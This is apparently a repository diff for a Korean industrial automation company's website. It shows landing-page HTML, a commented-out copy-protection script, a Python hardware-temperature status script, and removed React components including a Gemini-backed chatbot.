<div class="p-8"><h4 class="text-lg font-semibold text-slate-900 mb-3 font-premium" data-i18n="inst.i8.title">Smart Data Loggers</h4><p class="text-slate-500 text-sm leading-relaxed mb-6 font-light" data-i18n="inst.i8.desc">IoT-enabled data acquisition units with cloud connectivity</p>
<div class="space-y-2 text-xs text-slate-600 mb-6"><div class="flex gap-2"><i class="fas fa-check text-blue-600"></i> 16-32 analog channels</div><div class="flex gap-2"><i class="fas fa-check text-blue-600"></i> 4G/WiFi/Ethernet</div><div class="flex gap-2"><i class="fas fa-check text-blue-600"></i> Local data storage</div></div>
<!-- <a href="#contact" class="text-blue-600 font-bold text-xs uppercase tracking-widest hover:text-blue-700" data-i18n="inst.quote">Get Quote →</a> -->
</div>
</div>
</div>
<!-- <div class="mt-20 p-12 bg-gradient-to-r from-blue-600 to-blue-700 rounded-[2.5rem] text-white text-center">
<h3 class="text-3xl font-semibold mb-4 font-premium" data-i18n="inst.custom.title">Custom Integration Available</h3>
<p class="text-white/90 mb-8 max-w-2xl mx-auto font-light" data-i18n="inst.custom.desc">All instruments integrate seamlessly with our DCS and SCADA platforms.</p>
<a href="#contact" class="bg-white text-blue-600 hover:bg-slate-100 px-8 py-3 rounded-2xl font-bold transition-all inline-flex items-center gap-3 font-industrial text-xs tracking-widest uppercase" data-i18n="inst.custom.btn">Request Custom Configuration</a>
</div> -->
</div>
</section>
<!-- REFERENCES SECTION -->
<section id="services" class="py-32 bg-white">
<div class="container mx-auto px-6">
<div class="text-center max-w-5xl mx-auto mb-8">
<h2 class="text-blue-600 font-bold uppercase tracking-widest text-[11px] mb-4 font-industrial" data-i18n="svc.badge">Referenced Plant Varieties</h2>
<h3 class="text-4xl md:text-6xl font-light text-slate-900 mb-8 premium-kerning font-premium" data-i18n="svc.title">Versatile Process References</h3>
<p class="text-slate-500 text-lg leading-relaxed font-light" data-i18n="svc.desc">From deep understanding of various industry references to Seamless Execution.</p>
</div>
<div class="grid grid-cols-1 md:grid-cols-2 lg:grid-cols-4 gap-8">
<div class="service-card group flex flex-col h-full bg-slate-50 rounded-[2.5rem] overflow-hidden border border-transparent hover:border-blue-100 transition-all duration-500 hover:shadow-2xl">
<div class="h-56 overflow-hidden"><img src="assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" alt="DCS" class="service-image w-full h-full object-cover grayscale transition-all duration-700"></div>
<div class="p-10 flex-grow flex flex-col">
<div class="w-14 h-14 bg-white rounded-2xl shadow-sm flex items-center justify-center mb-2 group-hover:bg-blue-600 transition-all duration-500"><i class="fas fa-network-wired text-blue-600 group-hover:text-white text-xl"></i></div>
<h4 class="text-2xl font-normal text-slate-900 mb-4 font-premium" data-i18n="svc.s1.title">DCS Integration</h4>
<!--<p class="text-slate-500 text-sm leading-relaxed mb-10 font-light flx-grow" data-i18n="svc.s1.desc">Semiconductor Solvent Recovery & Production Plant., 80% Hydragin Plant, SNCR & SCR Envirionmental Plant, etc</p>-->
<ul class="text-slate-500 text-xs md:text-sm
leading-relaxed
mb-8 md:mb-10
font-light
flex-grow
space-y-3">
<li class="flex items-start gap-3">
<i class="fas fa-check text-blue-600 mt-1 text-[10px] md:text-xs"></i>
<span data-i18n="svc.s1.item1"></span>
</li>
<li class="flex items-start gap-3">
<i class="fas fa-check text-blue-600 mt-1 text-[10px] md:text-xs"></i>
<span data-i18n="svc.s1.item2"></span>
</li>
<li class="flex items-start gap-3">
<i class="fas fa-check text-blue-600 mt-1 text-[10px] md:text-xs"></i>
<span data-i18n="svc.s1.item3"></span>
</li>
<li class="flex items-start gap-3">
<i class="fas fa-check text-blue-600 mt-1 text-[10px] md:text-xs"></i>
<span data-i18n="svc.s1.item4"></span>
</li>
</ul>
<!-- <a href="#dcs" class="text-blue-600 font-bold text-xs uppercase tracking-widest flex items-center gap-3" data-i18n="svc.s1.link">Learn More <i class="fas fa-arrow-right"></i></a> -->
</div>
</div>
<div class="service-card group flex flex-col h-full bg-slate-50 rounded-[2.5rem] overflow-hidden border border-transparent hover:border-blue-100 transition-all duration-500 hover:shadow-2xl">
<div class="h-56 overflow-hidden"><img src="assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" alt="SCADA" class="service-image w-full h-full object-cover grayscale transition-all duration-700"></div>
<div class="p-10 flex-grow flex flex-col">
<div class="w-14 h-14 bg-white rounded-2xl shadow-sm flex items-center justify-center mb-2 group-hover:bg-blue-600 transition-all duration-500"><i class="fas fa-chart-line text-blue-600 group-hover:text-white text-xl"></i></div>
<h4 class="text-2xl font-normal text-slate-900 mb-4 font-premium" data-i18n="svc.s2.title">SCADA Design</h4>
<!--<p class="text-slate-500 text-sm leading-relaxed mb-10 font-light flex-grow" data-i18n="svc.s2.desc">Real-time monitoring platforms with advanced HMI and secure remote access protocols.</p>-->
<ul class="text-slate-500 text-xs md:text-sm
leading-relaxed
mb-8 md:mb-10
font-light
flex-grow
space-y-3">
<li class="flex items-start gap-3">
<i class="fas fa-check text-blue-600 mt-1 text-[10px] md:text-xs"></i>
<span data-i18n="svc.s2.item1"></span>
</li>
<li class="flex items-start gap-3">
<i class="fas fa-check text-blue-600 mt-1 text-[10px] md:text-xs"></i>
<span data-i18n="svc.s2.item2"></span>
</li>
<li class="flex items-start gap-3">
<i class="fas fa-check text-blue-600 mt-1 text-[10px] md:text-xs"></i>
<span data-i18n="svc.s2.item3"></span>
</li>
</ul>
<!-- <a href="#services" class="text-blue-600 font-bold text-xs uppercase tracking-widest flex items-center gap-3" data-i18n="svc.s2.link">Case Studies <i class="fas fa-arrow-right"></i></a> -->
</div>
</div>
<div class="service-card group flex flex-col h-full bg-slate-50 rounded-[2.5rem] overflow-hidden border border-transparent hover:border-blue-100 transition-all duration-500 hover:shadow-2xl">
<div class="h-56 overflow-hidden"><img src="assets/images/bearing.png" alt="Historian" class="service-image w-full h-full object-cover grayscale transition-all duration-700"></div>
<div class="p-10 flex-grow flex flex-col">
<div class="w-14 h-14 bg-white rounded-2xl shadow-sm flex items-center justify-center mb-2 group-hover:bg-blue-600 transition-all duration-500"><i class="fas fa-database text-blue-600 group-hover:text-white text-xl"></i></div>
<h4 class="text-2xl font-normal text-slate-900 mb-4 font-premium" data-i18n="svc.s3.title">Data Historians</h4>
<!--<p class="text-slate-500 text-sm leading-relaxed mb-10 font-light flex-grow" data-i18n="svc.s3.desc">Mission-critical SQL infrastructure optimized for massive industrial time-series data storage.</p>-->
<ul class="text-slate-500 text-xs md:text-sm
leading-relaxed
mb-8 md:mb-10
font-light
flex-grow
space-y-3">
<li class="flex items-start gap-3">
<i class="fas fa-check text-blue-600 mt-1 text-[10px] md:text-xs"></i>
<span data-i18n="svc.s3.item1"></span>
</li>
<li class="flex items-start gap-3">
<i class="fas fa-check text-blue-600 mt-1 text-[10px] md:text-xs"></i>
<span data-i18n="svc.s3.item2"></span>
</li>
<li class="flex items-start gap-3">
<i class="fas fa-check text-blue-600 mt-1 text-[10px] md:text-xs"></i>
<span data-i18n="svc.s3.item3"></span>
</li>
<li class="flex items-start gap-3">
<i class="fas fa-check text-blue-600 mt-1 text-[10px] md:text-xs"></i>
<span data-i18n="svc.s3.item4"></span>
</li>
</ul>
<!-- <a href="#dbsvr" class="text-blue-600 font-bold text-xs uppercase tracking-widest flex items-center gap-3" data-i18n="svc.s3.link">Data Security <i class="fas fa-arrow-right"></i></a> -->
</div>
</div>
<div class="service-card group flex flex-col h-full bg-slate-50 rounded-[2.5rem] overflow-hidden border border-transparent hover:border-blue-100 transition-all duration-500 hover:shadow-2xl">
<div class="h-56 overflow-hidden"><img src="assets/images/instrument.png" alt="Instruments" class="service-image w-full h-full object-cover grayscale transition-all duration-700"></div>
<div class="p-10 flex-grow flex flex-col">
<div class="w-14 h-14 bg-white rounded-2xl shadow-sm flex items-center justify-center mb-2 group-hover:bg-blue-600 transition-all duration-500"><i class="fas fa-gauge-high text-blue-600 group-hover:text-white text-xl"></i></div>
<h4 class="text-2xl font-normal text-slate-900 mb-4 font-premium" data-i18n="svc.s4.title">Control Instruments</h4>
<!--<p class="text-slate-500 text-sm leading-relaxed mb-10 font-light flex-grow" data-i18n="svc.s4.desc">Smart field sensors for flow, pressure, and temperature with high-accuracy calibration.</p>-->
<ul class="text-slate-500 text-xs md:text-sm
leading-relaxed
mb-8 md:mb-10
font-light
flex-grow
space-y-3">
<li class="flex items-start gap-3">
<i class="fas fa-check text-blue-600 mt-1 text-[10px] md:text-xs"></i>
<span data-i18n="svc.s4.item1"></span>
</li>
<li class="flex items-start gap-3">
<i class="fas fa-check text-blue-600 mt-1 text-[10px] md:text-xs"></i>
<span data-i18n="svc.s4.item2"></span>
</li>
<li class="flex items-start gap-3">
<i class="fas fa-check text-blue-600 mt-1 text-[10px] md:text-xs"></i>
<span data-i18n="svc.s4.item3"></span>
</li>
<li class="flex items-start gap-3">
<i class="fas fa-check text-blue-600 mt-1 text-[10px] md:text-xs"></i>
<span data-i18n="svc.s4.item4"></span>
</li>
<li class="flex items-start gap-3">
<i class="fas fa-check text-blue-600 mt-1 text-[10px] md:text-xs"></i>
<span data-i18n="svc.s4.item5"></span>
</li>
<li class="flex items-start gap-3">
<i class="fas fa-check text-blue-600 mt-1 text-[10px] md:text-xs"></i>
<span data-i18n="svc.s4.item6"></span>
</li>
</ul>
<!-- <a href="#products" class="text-blue-600 font-bold text-xs uppercase tracking-widest flex items-center gap-3" data-i18n="svc.s4.link">Product Catalog <i class="fas fa-arrow-right"></i></a> -->
</div>
</div>
</div>
</div>
</section>
<!-- ABOUT SECTION -->
<section id="about" class="py-32 bg-slate-50">
<div class="container mx-auto px-6">
<div class="grid lg:grid-cols-2 gap-20 items-center">
<div class="relative">
<div class="aspect-square rounded-[3rem] overflow-hidden shadow-2xl"><img src="assets/images/ControlRoom7.png" alt="About Hanmo" class="w-full h-full object-cover"></div>
<div class="absolute -bottom-10 -right-10 p-8 bg-blue-600 text-white rounded-[2rem] shadow-2xl max-w-xs">
<div class="text-6xl font-extralight mb-4 font-premium">20+</div>
<div class="text-xs font-bold uppercase tracking-widest leading-loose" data-i18n="about.years">Years of Industrial Excellence</div>
</div>
</div>
<div class="mt-10">
<h2 class="text-blue-600 font-bold uppercase tracking-widest text-[11px] mb-4 font-industrial" data-i18n="about.badge">About Hanmo</h2>
<h3 class="text-4xl md:text-5xl font-light text-slate-900 mb-8 premium-kerning font-premium" data-i18n="about.title">Trusted Partner in Industrial Automation</h3>
<p class="text-slate-500 leading-relaxed mb-6 font-light" data-i18n="about.p1">Since our founding, Hanmo Control & Network Co., Ltd. has been at the forefront of industrial automation engineering.</p>
<p class="text-slate-500 leading-relaxed mb-6 font-light" data-i18n="about.p2">Our team of 60+ certified engineers brings decades of combined experience in DCS, SCADA, and industrial networking.</p>
<div class="grid grid-cols-2 gap-6">
<div class="p-6 bg-white rounded-2xl border border-slate-100 shadow-sm">
<div class="text-3xl font-light text-slate-900 mb-1 font-premium">ISO 9001</div>
<div class="text-xs text-slate-400 uppercase tracking-widest font-industrial font-semibold" data-i18n="about.cert">Certified</div>
</div>
<div class="p-6 bg-white rounded-2xl border border-slate-100 shadow-sm">
<div class="text-3xl font-light text-slate-900 mb-1 font-premium">24 / 7</div>
<div class="text-xs text-slate-400 uppercase tracking-widest font-industrial font-semibold" data-i18n="about.support">Support</div>
</div>
</div>
</div>
</div>
</div>
</section>
<!-- CONTACT SECTION -->
<section id="contact" class="py-32 bg-slate-900">
<div class="container mx-auto px-6">
<div class="text-center max-w-3xl mx-auto mb-20">
<h2 class="text-blue-400 font-bold uppercase tracking-widest text-[11px] mb-4 font-industrial" data-i18n="contact.badge">Get In Touch</h2>
<h3 class="text-4xl md:text-6xl font-light text-white mb-8 premium-kerning font-premium" data-i18n="contact.title">Start Your Project</h3>
<p class="text-slate-400 text-lg leading-relaxed font-light" data-i18n="contact.desc">Contact our engineering team for a detailed consultation and project assessment.</p>
</div>
<div class="max-w-2xl mx-auto">
<div class="grid grid-cols-1 gap-5">
<div class="grid grid-cols-2 gap-5">
<input type="text" id="contact-name" data-i18n="contact.name" data-i18n-type="placeholder" placeholder="Full Name" class="bg-white/5 border border-white/10 text-white placeholder-slate-500 px-6 py-5 rounded-2xl focus:outline-none focus:border-blue-500 transition-colors font-light">
<input type="email" id="contact-email" data-i18n="contact.email" data-i18n-type="placeholder" placeholder="Email Address" class="bg-white/5 border border-white/10 text-white placeholder-slate-500 px-6 py-5 rounded-2xl focus:outline-none focus:border-blue-500 transition-colors font-light">
</div>
<input type="text" id="contact-company" data-i18n="contact.company" data-i18n-type="placeholder" placeholder="Company Name" class="bg-white/5 border border-white/10 text-white placeholder-slate-500 px-6 py-5 rounded-2xl focus:outline-none focus:border-blue-500 transition-colors font-light">
<textarea rows="5" id="contact-message" data-i18n="contact.msg" data-i18n-type="placeholder" placeholder="Describe your project requirements..." class="bg-white/5 border border-white/10 text-white placeholder-slate-500 px-6 py-5 rounded-2xl focus:outline-none focus:border-blue-500 transition-colors resize-none font-light"></textarea>
<button id="contact-submit" class="bg-blue-600 hover:bg-blue-700 text-white py-5 rounded-2xl font-bold transition-all hover:-translate-y-0.5 font-industrial text-xs tracking-widest uppercase shadow-2xl" data-i18n="contact.btn">Send Message</button>
<div id="contact-status" class="hidden p-5 rounded-2xl text-center font-light"></div>
</div>
</div>
</div>
</section>
</main>
<!-- FOOTER -->
<footer class="bg-slate-950 py-12 border-t border-white/5">
<div class="container mx-auto px-6 flex flex-col md:flex-row justify-between items-center gap-6">
<div class="flex items-center gap-3">
<div class="bg-blue-600 w-8 h-8 rounded-lg flex items-center justify-center">
<span class="text-white font-bold text-sm font-industrial">H</span>
</div>
<span class="text-white font-bold font-industrial text-sm">HANMO</span>
<span class="text-slate-500 text-xs font-industrial">Control & Network Co., Ltd.</span>
</div>
<p class="text-slate-600 text-xs font-light" data-i18n="footer.copy">© 2024 Hanmo Control & Network Co., Ltd. All rights reserved.</p>
</div>
</footer>
<!-- EmailJS SDK -->
<script src="https://cdn.jsdelivr.net/npm/@emailjs/browser@4/dist/email.min.js"></script>
<!-- i18n 먼저 로드 후 script.js -->
<script src="assets/js/i18n.js"></script>
<script src="assets/js/script.js"></script>
<!-- RIGHT-CLICK & COPY PROTECTION
<script>
// 우클릭 방지
document.addEventListener('contextmenu', function(e) {
e.preventDefault();
return false;
});
// 드래그 선택 방지
document.addEventListener('selectstart', function(e) {
e.preventDefault();
return false;
});
// 키보드 단축키 방지 (F12, Ctrl+U, Ctrl+S, Ctrl+Shift+I, Ctrl+Shift+J, Ctrl+Shift+C)
document.addEventListener('keydown', function(e) {
// F12
if (e.key === 'F12') {
e.preventDefault();
return false;
}
// Ctrl 조합 단축키
if (e.ctrlKey) {
const blocked = ['u', 's', 'p'];
if (blocked.includes(e.key.toLowerCase())) {
e.preventDefault();
return false;
}
// Ctrl+Shift 조합
if (e.shiftKey && ['i', 'j', 'c'].includes(e.key.toLowerCase())) {
e.preventDefault();
return false;
}
}
});
// 이미지 드래그 방지
document.addEventListener('dragstart', function(e) {
if (e.target.tagName === 'IMG') {
e.preventDefault();
return false;
}
});
</script> -->
</body> </body>
</html> </html>

View File

@@ -1 +0,0 @@
{"cpu_temp": "40", "nvme_temp": "33", "uptime_days": 2, "last_update": "18:31:01"}

View File

@@ -1,42 +0,0 @@
# 파일 경로: ~/services/hanmocnn/update_status.py
import json
import os
import time
def get_temp(name_keyword):
"""hwmon 폴더에서 이름 키워드로 온도를 찾아 반환 (milli-degree to degree)"""
try:
base_path = "/sys/class/hwmon"
for folder in os.listdir(base_path):
with open(os.path.join(base_path, folder, "name"), "r") as f:
if name_keyword in f.read():
with open(os.path.join(base_path, folder, "temp1_input"), "r") as t:
return int(t.read()) // 1000
except:
return "N/A"
return "N/A"
def get_hw_info():
# 1. CPU 온도 (가장 부하가 큰 bigcore0 기준)
cpu_temp = get_temp("bigcore0_thermal")
# 2. NVMe 온도
nvme_temp = get_temp("nvme")
# 3. 가동 시간 (Uptime)
with open("/proc/uptime", "r") as f:
uptime_days = int(float(f.readline().split()[0]) // 86400)
return {
"cpu_temp": str(cpu_temp),
"nvme_temp": str(nvme_temp),
"uptime_days": uptime_days,
"last_update": time.strftime("%H:%M:%S")
}
if __name__ == "__main__":
status = get_hw_info()
# 저장 경로: ~/services/hanmocnn/html/status.json
base_dir = os.path.dirname(os.path.abspath(__file__))
with open(os.path.join(base_dir, "html", "status.json"), "w") as f:
json.dump(status, f)

View File

@@ -1,50 +0,0 @@
import React, { useEffect } from 'react';
import { HashRouter as Router, Routes, Route, useLocation } from 'react-router-dom';
import Header from './components/Header';
import Hero from './components/Hero';
import Services from './components/Services';
import About from './components/About';
import Contact from './components/Contact';
import Footer from './components/Footer';
import ChatBot from './components/ChatBot';
const ScrollToTop = () => {
const { pathname } = useLocation();
useEffect(() => {
window.scrollTo(0, 0);
}, [pathname]);
return null;
};
const HomePage = () => (
<>
<Hero />
<Services />
<About />
<Contact />
</>
);
const App: React.FC = () => {
return (
<Router>
<ScrollToTop />
<div className="min-h-screen flex flex-col relative">
<Header />
<main className="flex-grow">
<Routes>
<Route path="/" element={<HomePage />} />
<Route path="/services" element={<div className="pt-24"><Services /></div>} />
<Route path="/about" element={<div className="pt-24"><About /></div>} />
<Route path="/contact" element={<div className="pt-24"><Contact /></div>} />
</Routes>
</main>
<Footer />
<ChatBot />
</div>
</Router>
);
};
export default App;

View File

@@ -1,20 +0,0 @@
<div align="center">
<img width="1200" height="475" alt="GHBanner" src="https://github.com/user-attachments/assets/0aa67016-6eaf-458a-adb2-6e31a0763ed6" />
</div>
# Run and deploy your AI Studio app
This contains everything you need to run your app locally.
View your app in AI Studio: https://ai.studio/apps/drive/12rxvTk7cfpawzA-KqF6Z1AfiIdHEhLqT
## Run Locally
**Prerequisites:** Node.js
1. Install dependencies:
`npm install`
2. Set the `GEMINI_API_KEY` in [.env.local](.env.local) to your Gemini API key
3. Run the app:
`npm run dev`

View File

@@ -13,7 +13,7 @@
<rect x="246" y="230" width="20" height="170" rx="10"/> <rect x="246" y="230" width="20" height="170" rx="10"/>
<!-- 밸브 본체 (아치형) --> <!-- 밸브 본체 (아치형) -->
<path d="M 100 230 Q 256 80, 412 230" <path d="M 100 230 Q 256 24, 412 230"
stroke="currentColor" stroke="currentColor"
stroke-width="30" stroke-width="30"
fill="none" fill="none"

Before

Width:  |  Height:  |  Size: 1.8 KiB

After

Width:  |  Height:  |  Size: 1.8 KiB

View File

@@ -285,10 +285,10 @@ const translations = {
'about.badge' : '회사 소개', 'about.badge' : '회사 소개',
'about.title' : '공정 자동화의 신뢰할 수 있는 파트너', 'about.title' : '공정 자동화의 신뢰할 수 있는 파트너',
'about.p1' : '(주)한모씨앤앤는 창립 이래 공정 자동화 엔지니어링의 최전선에서 활동하고 있습니다. 세계에서 가장 까다로운 공정 현장을 위한 미션 크리티컬 제어 시스템 설계, 구현 및 유지보수를 전문으로 합니다.', 'about.p1' : '(주)한모씨앤앤는 창립 이래 공정 자동화 엔지니어링의 최전선에서 활동하고 있습니다. 세계에서 가장 까다로운 공정 현장을 위한 미션 크리티컬 제어 시스템 설계, 구현 및 유지보수를 전문으로 합니다.',
'about.p2' : 'DCS, SCADA, 계측기기, 공정 네트워킹 분야에서 수십 년의 경험을 바탕으로 최고의 정밀도와 신뢰성을 보장합니다.', 'about.p2' : 'DCS, SCADA, 계측기기, 제어반 설계 및 제작, 공정 네트워킹 분야에서 수십 년의 경험을 바탕으로 최고의 정밀도와 신뢰성을 보장합니다.',
'about.cert' : '인증', 'about.cert' : '인증',
'about.support' : '지원', 'about.support' : '지원',
'about.years' : '여년간의 공정 제어 전문성', 'about.years' : 'Years of Industrial Excellence',
// CONTACT // CONTACT
'contact.badge' : '문의하기', 'contact.badge' : '문의하기',

View File

@@ -1,57 +0,0 @@
import React from 'react';
const About: React.FC = () => {
return (
<section id="about" className="py-24 bg-slate-50">
<div className="container mx-auto px-6">
<div className="grid lg:grid-cols-2 gap-16 items-center">
<div className="order-2 lg:order-1 relative">
<div className="aspect-[4/3] md:aspect-square rounded-[2rem] overflow-hidden shadow-2xl">
<img
src="https://images.unsplash.com/photo-1504384308090-c894fdcc538d?auto=format&fit=crop&q=80&w=1000"
alt="Our Engineering Facility"
className="w-full h-full object-cover"
/>
</div>
<div className="absolute -bottom-6 -left-6 md:-bottom-10 md:-left-10 p-6 md:p-8 bg-blue-600 text-white rounded-3xl shadow-2xl max-w-[200px] md:max-w-[240px]">
<div className="text-4xl md:text-5xl font-bold mb-2">15+</div>
<div className="text-sm font-semibold opacity-90 uppercase tracking-widest leading-tight">Years of Industrial Excellence</div>
</div>
</div>
<div className="order-1 lg:order-2">
<h2 className="text-blue-600 font-bold uppercase tracking-widest text-sm mb-3">Our Identity</h2>
<h3 className="text-3xl md:text-5xl font-extrabold text-slate-900 mb-8 leading-tight">
Designing the Future of Industrial Frameworks
</h3>
<p className="text-slate-600 mb-6 text-lg leading-relaxed">
Hanmo Control & Network Co., Ltd. was established on the foundation that industrial automation must be inherently reliable, perfectly integrated, and intelligently scalable.
</p>
<p className="text-slate-600 mb-10 leading-relaxed">
As strategic partners for global leaders transitioning into Industry 4.0, our experts specialize in everything from site-wide instrumentation to enterprise-grade data management.
</p>
<div className="grid sm:grid-cols-2 gap-6">
{[
{ title: 'Reliability Focused', icon: 'fa-shield-halved' },
{ title: 'Global Standards', icon: 'fa-globe' },
{ title: '24/7 Support', icon: 'fa-clock' },
{ title: 'Custom R&D', icon: 'fa-flask' },
].map((item, i) => (
<div key={i} className="flex items-center gap-4 p-4 bg-white rounded-2xl shadow-sm border border-slate-100">
<div className="w-10 h-10 bg-blue-50 rounded-lg flex items-center justify-center text-blue-600">
<i className={`fas ${item.icon}`}></i>
</div>
<span className="font-bold text-slate-800 text-sm">{item.title}</span>
</div>
))}
</div>
</div>
</div>
</div>
</section>
);
};
export default About;

View File

@@ -1,100 +0,0 @@
import React, { useState, useRef, useEffect } from 'react';
import { chatWithExpert } from '../services/geminiService';
import { Message } from '../types';
const ChatBot: React.FC = () => {
const [isOpen, setIsOpen] = useState(false);
const [input, setInput] = useState('');
const [messages, setMessages] = useState<Message[]>([
{ role: 'model', text: "Welcome to Hanmo! I'm your Technical Assistant. How can I help you with our DCS, SCADA, or field instrument solutions today?" }
]);
const [isLoading, setIsLoading] = useState(false);
const scrollRef = useRef<HTMLDivElement>(null);
useEffect(() => {
if (scrollRef.current) {
scrollRef.current.scrollTop = scrollRef.current.scrollHeight;
}
}, [messages, isOpen]);
const handleSend = async () => {
if (!input.trim() || isLoading) return;
const userMsg = input.trim();
setInput('');
setMessages(prev => [...prev, { role: 'user', text: userMsg }]);
setIsLoading(true);
const history = messages.map(m => ({ role: m.role, text: m.text }));
const responseText = await chatWithExpert(userMsg, history);
setMessages(prev => [...prev, { role: 'model', text: responseText }]);
setIsLoading(false);
};
return (
<div className="fixed bottom-6 right-6 z-[60]">
<button
onClick={() => setIsOpen(!isOpen)}
className="w-14 h-14 md:w-16 md:h-16 bg-blue-600 hover:bg-blue-700 text-white rounded-full shadow-2xl flex items-center justify-center transition-transform hover:scale-110 active:scale-95"
>
{isOpen ? <i className="fas fa-times text-2xl"></i> : <i className="fas fa-robot text-2xl"></i>}
</button>
{isOpen && (
<div className="absolute bottom-20 right-0 w-[calc(100vw-3rem)] md:w-96 h-[500px] max-h-[70vh] bg-white rounded-3xl shadow-2xl flex flex-col overflow-hidden border border-slate-200 animate-in fade-in slide-in-from-bottom-5">
<div className="p-5 bg-blue-600 text-white font-bold flex items-center justify-between">
<div className="flex items-center gap-3">
<i className="fas fa-microchip"></i>
<span>Tech Advisor</span>
</div>
<div className="w-2 h-2 bg-green-400 rounded-full animate-pulse"></div>
</div>
<div ref={scrollRef} className="flex-1 overflow-y-auto p-5 space-y-4 bg-slate-50">
{messages.map((m, i) => (
<div key={i} className={`flex ${m.role === 'user' ? 'justify-end' : 'justify-start'}`}>
<div className={`max-w-[85%] p-4 rounded-2xl text-sm leading-relaxed ${
m.role === 'user'
? 'bg-blue-600 text-white rounded-tr-none shadow-md'
: 'bg-white text-slate-700 shadow-sm border border-slate-100 rounded-tl-none'
}`}>
{m.text}
</div>
</div>
))}
{isLoading && (
<div className="flex justify-start">
<div className="bg-white p-4 rounded-2xl border border-slate-100 rounded-tl-none flex gap-1.5 shadow-sm">
<div className="w-1.5 h-1.5 bg-blue-400 rounded-full animate-bounce"></div>
<div className="w-1.5 h-1.5 bg-blue-400 rounded-full animate-bounce [animation-delay:0.2s]"></div>
<div className="w-1.5 h-1.5 bg-blue-400 rounded-full animate-bounce [animation-delay:0.4s]"></div>
</div>
</div>
)}
</div>
<div className="p-4 bg-white border-t border-slate-100 flex gap-2">
<input
type="text"
value={input}
onChange={(e) => setInput(e.target.value)}
onKeyDown={(e) => e.key === 'Enter' && handleSend()}
placeholder="Ask a technical question..."
className="flex-1 bg-slate-100 text-sm p-3 rounded-xl outline-none focus:ring-2 focus:ring-blue-600/20"
/>
<button
onClick={handleSend}
className="bg-blue-600 hover:bg-blue-700 text-white w-12 h-12 rounded-xl flex items-center justify-center transition-colors"
>
<i className="fas fa-paper-plane"></i>
</button>
</div>
</div>
)}
</div>
);
};
export default ChatBot;

View File

@@ -1,123 +0,0 @@
import React, { useState } from 'react';
const Contact: React.FC = () => {
const [status, setStatus] = useState<'idle' | 'sending' | 'success'>('idle');
const handleSubmit = (e: React.FormEvent) => {
e.preventDefault();
setStatus('sending');
setTimeout(() => setStatus('success'), 1500);
};
return (
<section id="contact" className="py-24 bg-white">
<div className="container mx-auto px-6">
<div className="max-w-6xl mx-auto bg-slate-900 rounded-[2rem] md:rounded-[3rem] overflow-hidden shadow-2xl flex flex-col lg:flex-row">
{/* Information Section */}
<div className="lg:w-5/12 p-8 md:p-16 bg-blue-600 text-white flex flex-col justify-between">
<div>
<h3 className="text-3xl md:text-4xl font-bold mb-6">Get in Touch</h3>
<p className="text-blue-100 mb-12 text-lg">
Ready to optimize your industrial infrastructure? Our engineering team is standing by to assist with your technical inquiries.
</p>
<div className="space-y-8">
<div className="flex gap-5 items-start">
<div className="w-10 h-10 bg-white/20 rounded-full flex items-center justify-center shrink-0">
<i className="fas fa-map-marker-alt"></i>
</div>
<div>
<h4 className="font-bold">Headquarters</h4>
<p className="text-blue-100 text-sm">Industrial Hub B123, Gangnam District<br />Seoul, South Korea</p>
</div>
</div>
<div className="flex gap-5 items-start">
<div className="w-10 h-10 bg-white/20 rounded-full flex items-center justify-center shrink-0">
<i className="fas fa-phone-alt"></i>
</div>
<div>
<h4 className="font-bold">Phone</h4>
<p className="text-blue-100 text-sm">+82 2-1234-5678</p>
</div>
</div>
<div className="flex gap-5 items-start">
<div className="w-10 h-10 bg-white/20 rounded-full flex items-center justify-center shrink-0">
<i className="fas fa-envelope"></i>
</div>
<div>
<h4 className="font-bold">Email</h4>
<p className="text-blue-100 text-sm">solutions@hanmocontrol.com</p>
</div>
</div>
</div>
</div>
<div className="mt-16 flex gap-4">
<a href="#" className="w-12 h-12 bg-white/10 hover:bg-white/30 rounded-full flex items-center justify-center transition-all">
<i className="fab fa-linkedin-in text-xl"></i>
</a>
<a href="#" className="w-12 h-12 bg-white/10 hover:bg-white/30 rounded-full flex items-center justify-center transition-all">
<i className="fab fa-twitter text-xl"></i>
</a>
</div>
</div>
{/* Form Section */}
<div className="lg:w-7/12 p-8 md:p-16 bg-white">
{status === 'success' ? (
<div className="h-full flex flex-col items-center justify-center text-center space-y-6">
<div className="w-24 h-24 bg-green-100 text-green-600 rounded-full flex items-center justify-center text-4xl">
<i className="fas fa-check"></i>
</div>
<h4 className="text-3xl font-extrabold text-slate-900">Inquiry Received</h4>
<p className="text-slate-500 text-lg">Thank you for reaching out. An automation consultant will review your request and contact you within 24 hours.</p>
<button
onClick={() => setStatus('idle')}
className="text-blue-600 font-bold hover:underline"
>
Send another request
</button>
</div>
) : (
<form onSubmit={handleSubmit} className="space-y-6">
<div className="grid sm:grid-cols-2 gap-6">
<div className="space-y-2">
<label className="text-xs font-bold text-slate-500 uppercase tracking-widest">Full Name</label>
<input required type="text" className="w-full bg-slate-50 border border-slate-200 p-4 rounded-xl outline-none focus:ring-4 focus:ring-blue-500/10 focus:border-blue-500 transition-all" placeholder="John Doe" />
</div>
<div className="space-y-2">
<label className="text-xs font-bold text-slate-500 uppercase tracking-widest">Work Email</label>
<input required type="email" className="w-full bg-slate-50 border border-slate-200 p-4 rounded-xl outline-none focus:ring-4 focus:ring-blue-500/10 focus:border-blue-500 transition-all" placeholder="j.doe@company.com" />
</div>
</div>
<div className="space-y-2">
<label className="text-xs font-bold text-slate-500 uppercase tracking-widest">Requirement Type</label>
<select className="w-full bg-slate-50 border border-slate-200 p-4 rounded-xl outline-none focus:ring-4 focus:ring-blue-500/10 focus:border-blue-500 transition-all">
<option>DCS Architecture Design</option>
<option>SCADA System Integration</option>
<option>Database & Historian Setup</option>
<option>Field Instrumentation Supply</option>
<option>Technical Support</option>
</select>
</div>
<div className="space-y-2">
<label className="text-xs font-bold text-slate-500 uppercase tracking-widest">Project Details</label>
<textarea required rows={5} className="w-full bg-slate-50 border border-slate-200 p-4 rounded-xl outline-none focus:ring-4 focus:ring-blue-500/10 focus:border-blue-500 transition-all" placeholder="Tell us about your technical requirements..."></textarea>
</div>
<button
disabled={status === 'sending'}
className="w-full bg-slate-900 hover:bg-blue-600 text-white font-bold py-5 rounded-xl shadow-lg transition-all active:scale-[0.98] disabled:opacity-50"
>
{status === 'sending' ? 'Processing...' : 'Submit Inquiry'}
</button>
</form>
)}
</div>
</div>
</div>
</section>
);
};
export default Contact;

View File

@@ -1,74 +0,0 @@
import React from 'react';
const Footer: React.FC = () => {
return (
<footer className="bg-slate-900 text-white pt-20 pb-10">
